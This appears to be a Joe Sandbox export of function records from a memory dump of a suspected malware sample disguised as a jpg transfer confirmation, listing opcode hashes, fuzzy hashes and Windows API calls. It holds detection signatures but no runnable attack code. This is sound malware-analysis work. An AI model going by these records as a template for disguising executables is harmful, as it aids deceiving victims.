                                                                                                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Long
                                                                                                          • String ID: SysTreeView32
                                                                                                          • API String ID: 847901565-1698111956
                                                                                                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Window
                                                                                                          • String ID: SysMonthCal32
                                                                                                          • API String ID: 2326795674-1439706946
                                                                                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                          APIs
                                                                                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow
                                                                                                          • String ID: msctls_updown32
                                                                                                          • API String ID: 3375834691-2298589950
                                                                                                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memmove
                                                                                                          • String ID: $<
                                                                                                          • API String ID: 4104443479-428540627
                                                                                                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 1682464887-234962358
                                                                                                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 1682464887-234962358
                                                                                                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DiskFreeSpace
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 1682464887-234962358
                                                                                                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 2507767853-234962358
                                                                                                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 2507767853-234962358
                                                                                                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID: msctls_trackbar32
                                                                                                          • API String ID: 3850602802-1010561917
                                                                                                          • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                          • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                          • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                          • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                          • String ID: crts
                                                                                                          • API String ID: 943502515-3724388283
                                                                                                          • Opcode ID: 08af2f095981145846b9209207a54205310ea625501f8091d59343c9a61b7938
                                                                                                          • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                          • Opcode Fuzzy Hash: 08af2f095981145846b9209207a54205310ea625501f8091d59343c9a61b7938
                                                                                                          • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                          • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                          • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$LabelVolume
                                                                                                          • String ID: \VH
                                                                                                          • API String ID: 2006950084-234962358
                                                                                                          • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                          • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                          • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                          • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                          • DrawMenuBar.USER32 ref: 00449761
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 772068139-4108050209
                                                                                                          • Opcode ID: f3881f9784b5deeb24e105df658f2c36b9320f957bca43c298b9856599369fa4
                                                                                                          • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                          • Opcode Fuzzy Hash: f3881f9784b5deeb24e105df658f2c36b9320f957bca43c298b9856599369fa4
                                                                                                          • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcscpy
                                                                                                          • String ID: 3, 3, 8, 1
                                                                                                          • API String ID: 3469035223-357260408
                                                                                                          • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                          • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                          • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                          • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                          APIs
